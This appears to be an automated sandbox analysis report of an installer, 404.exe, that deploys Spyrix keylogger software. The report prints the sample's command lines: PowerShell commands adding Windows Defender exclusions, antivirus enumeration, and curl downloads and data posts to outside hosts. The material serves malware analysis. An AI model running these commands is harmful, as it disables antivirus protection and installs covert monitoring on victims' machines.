Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmp	Jump to dropped file

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

API coverage: 7.5 %

Source: C:\Users\user\Desktop\404.exe TID: 6752	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\404.exe TID: 5916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648	Thread sleep count: 7681 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6936	Thread sleep count: 1854 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 6697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 3102 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732	Thread sleep count: 1937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732	Thread sleep count: 7684 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064	Thread sleep count: 8131 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep count: 1386 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 812	Thread sleep count: 7831 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep count: 1781 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep count: 1007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep count: 8505 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 6878 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 2764 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep count: 6329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep count: 2795 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5404	Thread sleep count: 8129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4636	Thread sleep count: 1518 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876	Thread sleep count: 7783 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760	Thread sleep count: 1798 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 5140	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3912	Thread sleep count: 127 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5744	Thread sleep count: 47 > 30

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0040AC68 FindFirstFileW,FindClose,	51_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	51_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033A75E8 FindFirstFileA,	51_2_033A75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033A76C4 FindFirstFileA,GetLastError,	51_2_033A76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A60F2 GetSystemInfo,

51_2_033A60F2

Source: C:\Users\user\Desktop\404.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData

Source: 404.exe, 00000000.00000002.1647791601.0000000000722000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1708845955.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.000000000181E000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000003E.00000002.3001411375.000000000297B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001088000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000033.00000003.2967766062.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: @@IdPORT_vmnet

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

API call chain: ExitProcess graph end node

graph_51-28425

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033CB8B0 rdtsc

51_2_033CB8B0

Source: C:\Users\user\Desktop\404.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_0023119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

65_2_0023119B

Source: C:\Users\user\Desktop\404.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'

Source: C:\Users\user\Desktop\404.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F			Jump to behavior

Source: spkl.exe, 00000033.00000002.3201106110.0000000000A84000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2967766062.00000000044A0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: @@DOF_PROGMAN

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_003EEE90 cpuid

65_2_003EEE90

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	51_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	51_2_0040A298
